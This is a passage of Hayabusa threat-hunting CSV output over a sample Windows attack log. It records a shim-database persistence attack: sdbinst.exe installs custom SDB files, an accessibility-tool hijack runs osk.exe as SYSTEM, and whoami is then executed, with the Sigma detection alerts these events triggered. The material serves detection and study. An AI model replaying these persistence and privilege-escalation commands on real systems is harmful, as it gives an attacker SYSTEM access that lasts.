(32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.982 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2108 | PGUID: 365ABB72-55E8-5C91-0000-0010AEE50700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:45.152 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:45.162 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2104 | PGUID: 365ABB72-55E9-5C91-0000-00102EEB0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:45.162 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:45.172 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:47.245 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2568 | PGUID: 365ABB72-55EB-5C91-0000-001076F60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:51:05.017 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 612 | PGUID: 365ABB72-5638-5C91-0000-0010651A0800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.933 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.933 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.953 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{7146b11e-ec78-4046-b854-9c9bdc68691e}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.953 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.953 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.973 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.973 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.973 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.983 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.104 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.104 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.114 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4012 | PGUID: 365ABB72-568A-5C91-0000-0010A6450800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.274 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.364 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.364 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4072 | PGUID: 365ABB72-568A-5C91-0000-0010D24B0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.364 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:29.138 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2476 | PGUID: 365ABB72-568D-5C91-0000-001061560800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.124 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.124 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.144 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{9aadf096-343f-4575-9514-4e5551e5ff19}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.144 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.144 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.154 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.164 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.164 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.164 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.294 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.294 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.334 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3100 | PGUID: 365ABB72-569F-5C91-0000-00105F670800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.474 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.474 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3140 | PGUID: 365ABB72-569F-5C91-0000-0010D96C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.474 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.484 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:50.268 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3312 | PGUID: 365ABB72-56A2-5C91-0000-0010D2770800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:56:05.149 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3176 | PGUID: 365ABB72-5765-5C91-0000-001039030900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:20.994 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:20.994 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.014 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.014 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.014 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.044 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.044 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.054 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.054 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:28.214 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 384 | PGUID: 365ABB72-57F4-5C91-0000-0010F0910900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:28.294 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2892 | PGUID: 365ABB72-57F4-5C91-0000-001083920900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:28.304 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3700 | PGUID: 365ABB72-57F4-5C91-0000-001070930900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:28.815 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2604 | PGUID: 365ABB72-57F4-5C91-0000-0010BB9C0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:31.860 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:31.860 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:35.745 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-57FB-5C91-0000-00104FD40900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:44.237 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\osk.exe"" | LID: 0x3e7 | PID: 2456 | PGUID: 365ABB72-5804-5C91-0000-001044DE0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:44.237 +00:00,PC01.example.corp,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:44.237 +00:00,PC01.example.corp,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:44.237 +00:00,PC01.example.corp,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:44.237 +00:00,PC01.example.corp,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:00:01.518 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2772 | PGUID: 365ABB72-5851-5C91-0000-0010E1030A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:00:01.539 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\wsqmcons.exe | LID: 0x3e7 | PID: 2716 | PGUID: 365ABB72-5851-5C91-0000-00107D050A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:10:34.489 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 792 | PGUID: 365ABB72-5ACA-5C91-0000-0010DC1E0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:18:54.257 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2884 | 